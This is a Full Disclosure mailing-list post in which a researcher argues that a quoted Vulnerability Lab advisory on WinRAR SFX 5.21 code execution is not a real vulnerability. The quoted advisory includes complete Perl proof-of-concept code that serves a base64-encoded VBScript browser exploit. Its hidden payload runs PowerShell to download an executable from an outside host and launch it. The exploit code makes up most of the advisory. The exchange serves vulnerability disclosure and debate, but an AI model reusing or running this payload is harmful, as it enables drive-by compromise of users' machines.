Correct me if I'm wrong, but the vulnerability can be summarized as: if you run an untrusted .exe you might execute malicious code?
I hardly see this as giving anything new to the attacker who can just create a malicious exe file, set the winrar sfx icon and send it to the victim. Keep in mind that not every unexpected behavior or software bug is a security vulnerability. (and no, potential AV bypass doesn't make it a vulnerability either) Cheers, Gynvael On Mon, 28 Sep 2015 10:27 Vulnerability Lab <resea...@vulnerability-lab.com> wrote: > Document Title: > =============== > WinRAR SFX v5.21 - Remote Code Execution Vulnerability > > > References (Source): > ==================== > http://www.vulnerability-lab.com/get_content.php?id=1608 > > Video: https://www.youtube.com/watch?v=fo0l0oT4468 > > > Release Date: > ============= > 2015-09-28 > > > Vulnerability Laboratory ID (VL-ID): > ==================================== > 1608 > > > Common Vulnerability Scoring System: > ==================================== > 9 > > > Product & Service Introduction: > =============================== > WinRAR with over 500 million users worldwide by far the most popular > compression program and therefore the best way to files securely and > efficiently to pack for a data transfer to speed up the data transfer via > e-mail and secure storage optimized files. > > (Copy of the Homepage: http://www.win-rar.com/start.html ) > > > Abstract Advisory Information: > ============================== > An independent vulnerability laboratory researcher discovered a code > execution vulnerability in the official WInRAR SFX v5.21 software. > > > Vulnerability Disclosure Timeline: > ================================== > 2015-09-28: Public Disclosure (Vulnerability Laboratory) > > > Discovery Status: > ================= > Published > > > Exploitation Technique: > ======================= > Remote > > > Severity Level: > =============== > Critical > > > Technical Details & Description: > ================================ > A remote code execution vulnerability has been discovered in the official > WInRAR SFX v5.21 software. > The vulnerability allows remote attackers to unauthorized execute system > specific code to comrpomise a target system. > > The issue is located in the `Text and Icon` function of the `Text to > display in SFX window` module. Remote attackers are > able to generate own compressed archives with maliciuous payloads to > execute system specific codes for compromise. The attackers > saved in the sfx archive input the malicious generated html code. Thus > results in a system specific code execution when a target > user or system is processing to open the comprossed archive. > > The security risk of the code execution vulnerability is estimated as > critical with a cvss (common vulnerability scoring system) count of 9.2. > Exploitation of the code execution vulnerability requires low user > interaction (open file) without privilege system or restricted user > accounts. > Successful exploitation of the remote code execution vulnerability in the > WinRAR SFX software results in system, network or device compromise. > > > Proof of Concept (PoC): > ======================= > The code execution vulnerability can be exploited by remote attackers > without privilege system user account or user interaction. > For security demonstration or to reproduce the vulnerability follow the > provided information and steps below to continue. > > Manual steps to reproduce the vulnerability ... > 1. Run perl code : perl poc.pl > 2. Right Click on any file and select "add to archive..." > 3. Select "Create SFX archive" > 4. Go to the Advanced Menu and select "SFX options..." > 5. Go to the "Text and icon" Menu > 6. Copy this perl output (HTML) and past on "Text to display in SFX > window" > 7. Click OK -- OK > 8. Your SFX file Created > 9. Just open sfx file > 10. Your Link Download/Execute on your target > 11. Successful reproduce of the code execution vulnerability! > > > PoC: Exploit Code > #!/usr/bin/perl > # Title : WinRaR SFX - Remote Code Execution > # Affected Versions: All Version > # Tested on Windows 7 / Server 2008 > # > # Author: Mohammad Reza Espargham > # Linkedin: https://ir.linkedin.com/in/rezasp > # E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]com > # Website: www.reza.es > # Twitter: https://twitter.com/rezesp > # FaceBook: https://www.facebook.com/reza.espargham > # > # ID: MS14-064 > > use strict; > use warnings; > use IO::Socket; > use MIME::Base64 qw( decode_base64 ); > use Socket 'inet_ntoa'; > use Sys::Hostname 'hostname'; > > print " Mohammad Reza Espargham\n\n"; > my $ip = inet_ntoa(scalar gethostbyname(hostname() || 'localhost')); > > my $port = 80; > > print "Winrar HTML Code\n".'<html><head><title>poc</title><META > http-equiv="refresh" content="0;URL=http://' . $ip . > '"></head></html>'."\n\n" if($port==80); > print "Winrar HTML Code\n".'<html><head><title>poc</title><META > http-equiv="refresh" content="0;URL=http://' . $ip . ':' . $port . > '"></head></html>'."\n\n" if($port!=80); > > my $server = new IO::Socket::INET( Proto => 'tcp', > LocalPort => $port, > Listen => SOMAXCONN, > ReuseAddr => 1) > or die "Unable to create server socket"; > > # Server loop > while(my $client = $server->accept()) > { > my $client_info; > while(<$client>) > { > last if /^\r\n$/; > $client_info .= $_; > } > incoming($client, $client_info); > } > > sub incoming > { > print "\n=== Incoming Request:\n"; > my $client = shift; > print $client &buildResponse($client, shift); > close($client); > } > > sub buildResponse > { > my $client = shift; > my $client_info = shift; > > my > $poc="CjxodG1sPgo8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVt > > dWxhdGVJRTgiID4KPGhlYWQ+CjwvaGVhZD4KPGJvZHk+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJT > > Y3JpcHQiPgoKZnVuY3Rpb24gcnVubXVtYWEoKSAKT24gRXJyb3IgUmVzdW1lIE5leHQKc2V0IHNo > > ZWxsPWNyZWF0ZW9iamVjdCgiU2hlbGwuQXBwbGljYXRpb24iKQpjb21tYW5kPSJJbnZva2UtRXhw > > cmVzc2lvbiAkKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgn > > aHR0cDovL3RoZS5lYXJ0aC5saS9+c2d0YXRoYW0vcHV0dHkvbGF0ZXN0L3g4Ni9wdXR0eS5leGUn > > LCdsb2FkLmV4ZScpOyQoTmV3LU9iamVjdCAtY29tIFNoZWxsLkFwcGxpY2F0aW9uKS5TaGVsbEV4 > > ZWN1dGUoJ2xvYWQuZXhlJyk7IgpzaGVsbC5TaGVsbEV4ZWN1dGUgInBvd2Vyc2hlbGwuZXhlIiwg > > Ii1Db21tYW5kICIgJiBjb21tYW5kLCAiIiwgInJ1bmFzIiwgMAplbmQgZnVuY3Rpb24KPC9zY3Jp > > cHQ+CiAKPFNDUklQVCBMQU5HVUFHRT0iVkJTY3JpcHQiPgogIApkaW0gICBhYSgpCmRpbSAgIGFi > > KCkKZGltICAgYTAKZGltICAgYTEKZGltICAgYTIKZGltICAgYTMKZGltICAgd2luOXgKZGltICAg > > aW50VmVyc2lvbgpkaW0gICBybmRhCmRpbSAgIGZ1bmNsYXNzCmRpbSAgIG15YXJyYXkKIApCZWdp > > bigpCiAKZnVuY3Rpb24gQmVnaW4oKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgaW5mbz1OYXZp > > Z2F0b3IuVXNlckFnZW50CiAKICBpZihpbnN0cihpbmZvLCJXaW42NCIpPjApICAgdGhlbgogICAg > > IGV4aXQgICBmdW5jdGlvbgogIGVuZCBpZgogCiAgaWYgKGluc3RyKGluZm8sIk1TSUUiKT4wKSAg > > IHRoZW4gCiAgICAgICAgICAgICBpbnRWZXJzaW9uID0gQ0ludChNaWQoaW5mbywgSW5TdHIoaW5m > > bywgIk1TSUUiKSArIDUsIDIpKSAgIAogIGVsc2UKICAgICBleGl0ICAgZnVuY3Rpb24gIAogICAg > > ICAgICAgICAgIAogIGVuZCBpZgogCiAgd2luOXg9MAogCiAgQmVnaW5Jbml0KCkKICBJZiBDcmVh > > dGUoKT1UcnVlIFRoZW4KICAgICBteWFycmF5PSAgICAgICAgY2hydygwMSkmY2hydygyMTc2KSZj > > aHJ3KDAxKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKSZjaHJ3KDAwKQogICAg > > IG15YXJyYXk9bXlhcnJheSZjaHJ3KDAwKSZjaHJ3KDMyNzY3KSZjaHJ3KDAwKSZjaHJ3KDApCiAK > > ICAgICBpZihpbnRWZXJzaW9uPDQpIHRoZW4KICAgICAgICAgZG9jdW1lbnQud3JpdGUoIjxicj4g > > SUUiKQogICAgICAgICBkb2N1bWVudC53cml0ZShpbnRWZXJzaW9uKQogICAgICAgICBydW5zaGVs > > bGNvZGUoKSAgICAgICAgICAgICAgICAgICAgCiAgICAgZWxzZSAgCiAgICAgICAgICBzZXRub3Rz > > YWZlbW9kZSgpCiAgICAgZW5kIGlmCiAgZW5kIGlmCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIEJl > > Z2luSW5pdCgpCiAgIFJhbmRvbWl6ZSgpCiAgIHJlZGltIGFhKDUpCiAgIHJlZGltIGFiKDUpCiAg > > IGEwPTEzKzE3KnJuZCg2KQogICBhMz03KzMqcm5kKDUpCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9u > > IENyZWF0ZSgpCiAgT24gRXJyb3IgUmVzdW1lIE5leHQKICBkaW0gaQogIENyZWF0ZT1GYWxzZQog > > IEZvciBpID0gMCBUbyA0MDAKICAgIElmIE92ZXIoKT1UcnVlIFRoZW4KICAgICAgIENyZWF0ZT1U > > cnVlCiAgICAgICBFeGl0IEZvcgogICAgRW5kIElmIAogIE5leHQKZW5kIGZ1bmN0aW9uCiAKc3Vi > > IHRlc3RhYSgpCmVuZCBzdWIKIApmdW5jdGlvbiBteWRhdGEoKQogICAgT24gRXJyb3IgUmVzdW1l > > IE5leHQKICAgICBpPXRlc3RhYQogICAgIGk9bnVsbAogICAgIHJlZGltICBQcmVzZXJ2ZSBhYShh > > MikgIAogICAKICAgICBhYigwKT0wCiAgICAgYWEoYTEpPWkKICAgICBhYigwKT02LjM2NTk4NzM3 > > NDM3ODAxRS0zMTQKIAogICAgIGFhKGExKzIpPW15YXJyYXkKICAgICBhYigyKT0xLjc0MDg4NTM0 > > NzMxMzI0RS0zMTAgIAogICAgIG15ZGF0YT1hYShhMSkKICAgICByZWRpbSAgUHJlc2VydmUgYWEo > > YTApICAKZW5kIGZ1bmN0aW9uIAogCiAKZnVuY3Rpb24gc2V0bm90c2FmZW1vZGUoKQogICAgT24g > > RXJyb3IgUmVzdW1lIE5leHQKICAgIGk9bXlkYXRhKCkgIAogICAgaT1ydW0oaSs4KQogICAgaT1y > > dW0oaSsxNikKICAgIGo9cnVtKGkrJmgxMzQpICAKICAgIGZvciBrPTAgdG8gJmg2MCBzdGVwIDQK > > ICAgICAgICBqPXJ1bShpKyZoMTIwK2spCiAgICAgICAgaWYoaj0xNCkgdGhlbgogICAgICAgICAg > > ICAgIGo9MCAgICAgICAgICAKICAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAg > > ICAgICAgICAgIAogICAgIGFhKGExKzIpKGkrJmgxMWMrayk9YWIoNCkKICAgICAgICAgICAgICBy > > ZWRpbSAgUHJlc2VydmUgYWEoYTApICAKIAogICAgIGo9MCAKICAgICAgICAgICAgICBqPXJ1bShp > > KyZoMTIwK2spICAgCiAgICAgICAgICAKICAgICAgICAgICAgICAgRXhpdCBmb3IKICAgICAgICAg > > ICBlbmQgaWYKIAogICAgbmV4dCAKICAgIGFiKDIpPTEuNjk3NTk2NjMzMTY3NDdFLTMxMwogICAg > > cnVubXVtYWEoKSAKZW5kIGZ1bmN0aW9uCiAKZnVuY3Rpb24gT3ZlcigpCiAgICBPbiBFcnJvciBS > > ZXN1bWUgTmV4dAogICAgZGltIHR5cGUxLHR5cGUyLHR5cGUzCiAgICBPdmVyPUZhbHNlCiAgICBh > > MD1hMCthMwogICAgYTE9YTArMgogICAgYTI9YTArJmg4MDAwMDAwCiAgIAogICAgcmVkaW0gIFBy > > ZXNlcnZlIGFhKGEwKSAKICAgIHJlZGltICAgYWIoYTApICAgICAKICAgCiAgICByZWRpbSAgUHJl > > c2VydmUgYWEoYTIpCiAgIAogICAgdHlwZTE9MQogICAgYWIoMCk9MS4xMjM0NTY3ODkwMTIzNDU2 > > Nzg5MDEyMzQ1Njc4OTAKICAgIGFhKGEwKT0xMAogICAgICAgICAgIAogICAgSWYoSXNPYmplY3Qo > > YWEoYTEtMSkpID0gRmFsc2UpIFRoZW4KICAgICAgIGlmKGludFZlcnNpb248NCkgdGhlbgogICAg > > ICAgICAgIG1lbT1jaW50KGEwKzEpKjE2ICAgICAgICAgICAgIAogICAgICAgICAgIGo9dmFydHlw > > ZShhYShhMS0xKSkKICAgICAgICAgICBpZigoaj1tZW0rNCkgb3IgKGoqOD1tZW0rOCkpIHRoZW4K > > ICAgICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAg > > ICAgICAgICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbiAgICAgICAgICAgICAK > > ICAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUoYWEoYTEpKQogICAgICAgICAgICAgICAg > > IGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICAgIGVuZCBpZgogICAgICAgICAgIGVs > > c2UKICAgICAgICAgICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKICAgICAgICAgICAgIGV4aXQg > > IGZ1bmN0aW9uCiAKICAgICAgICAgICBlbmQgaWYgCiAgICAgICAgZWxzZQogICAgICAgICAgIGlm > > KHZhcnR5cGUoYWEoYTEtMSkpPD4wKSAgVGhlbiAgICAKICAgICAgICAgICAgICBJZihJc09iamVj > > dChhYShhMSkpID0gRmFsc2UgKSBUaGVuCiAgICAgICAgICAgICAgICAgIHR5cGUxPVZhclR5cGUo > > YWEoYTEpKQogICAgICAgICAgICAgIGVuZCBpZiAgICAgICAgICAgICAgIAogICAgICAgICAgICBl > > bmQgaWYKICAgICAgICBlbmQgaWYKICAgIGVuZCBpZgogICAgICAgICAgICAgICAKICAgICAKICAg > > IElmKHR5cGUxPSZoMmY2NikgVGhlbiAgICAgICAgIAogICAgICAgICAgT3Zlcj1UcnVlICAgICAg > > CiAgICBFbmQgSWYgIAogICAgSWYodHlwZTE9JmhCOUFEKSBUaGVuCiAgICAgICAgICBPdmVyPVRy > > dWUKICAgICAgICAgIHdpbjl4PTEKICAgIEVuZCBJZiAgCiAKICAgIHJlZGltICBQcmVzZXJ2ZSBh > > YShhMCkgICAgICAgICAgCiAgICAgICAgIAplbmQgZnVuY3Rpb24KIApmdW5jdGlvbiBydW0oYWRk > > KSAKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTIpICAK > > ICAgCiAgICBhYigwKT0wICAgCiAgICBhYShhMSk9YWRkKzQgICAgIAogICAgYWIoMCk9MS42OTc1 > > OTY2MzMxNjc0N0UtMzEzICAgICAgIAogICAgcnVtPWxlbmIoYWEoYTEpKSAgCiAgICAKICAgIGFi > > KDApPTAKICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkKZW5kIGZ1bmN0aW9uCiAKPC9zY3JpcHQ+ > CiAKPC9ib2R5Pgo8L2h0bWw+"; > $poc = decode_base64($poc); > > my $r = "HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n > $poc"; > return $r; > } > > > Security Risk: > ============== > The security risk of the code execution vulnerability in the winrar sfx > software is estimated as high. (CVSS 7.4) > > > Credits & Authors: > ================== > Mohammad Reza Espargham [https://ir.linkedin.com/in/rezasp] (m...@reza.es > or reza.esparg...@gmail.com] (www.reza.es) > > > Disclaimer & Information: > ========================= > The information provided in this advisory is provided as it is without any > warranty. Vulnerability Lab disclaims all warranties, either expressed > or implied, including the warranties of merchantability and capability for > a particular purpose. Vulnerability-Lab or its suppliers are not liable > in any case of damage, including direct, indirect, incidental, > consequential loss of business profits or special damages, even if > Vulnerability-Lab > or its suppliers have been advised of the possibility of such damages. > Some states do not allow the exclusion or limitation of liability for > consequential or incidental damages so the foregoing limitation may not > apply. We do not approve or encourage anybody to break any vendor licenses, > policies, deface websites, hack into databases or trade with fraud/stolen > material. > > Domains: www.vulnerability-lab.com - www.vuln-lab.com > - www.evolution-sec.com > Contact: ad...@vulnerability-lab.com - > resea...@vulnerability-lab.com - > ad...@evolution-sec.com > Section: magazine.vulnerability-db.com - > vulnerability-lab.com/contact.php - > evolution-sec.com/contact > Social: twitter.com/#!/vuln_lab - > facebook.com/VulnerabilityLab - > youtube.com/user/vulnerability0lab > Feeds: vulnerability-lab.com/rss/rss.php - > vulnerability-lab.com/rss/rss_upcoming.php - > vulnerability-lab.com/rss/rss_news.php > Programs: vulnerability-lab.com/submit.php - > vulnerability-lab.com/list-of-bug-bounty-programs.php - > vulnerability-lab.com/register/ > > Any modified copy or reproduction, including partially usages, of this > file requires authorization from Vulnerability Laboratory. Permission to > electronically redistribute this alert in its unmodified form is granted. > All other rights, including the use of other media, are reserved by > Vulnerability-Lab Research Team or its suppliers. All pictures, texts, > advisories, source code, videos and other information on this website > is trademark of vulnerability-lab team & the specific authors or managers. > To record, list (feed), modify, use or edit our material contact > (ad...@vulnerability-lab.com or resea...@vulnerability-lab.com) to get a > permission. > > Copyright © 2015 | Vulnerability > Laboratory - [Evolution Security GmbH]™ > > > > -- > VULNERABILITY LABORATORY - RESEARCH TEAM > SERVICE: www.vulnerability-lab.com > CONTACT: resea...@vulnerability-lab.com > PGP KEY: > http://www.vulnerability-lab.com/keys/ad...@vulnerability-lab.com%280x198E9928%29.txt > > > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
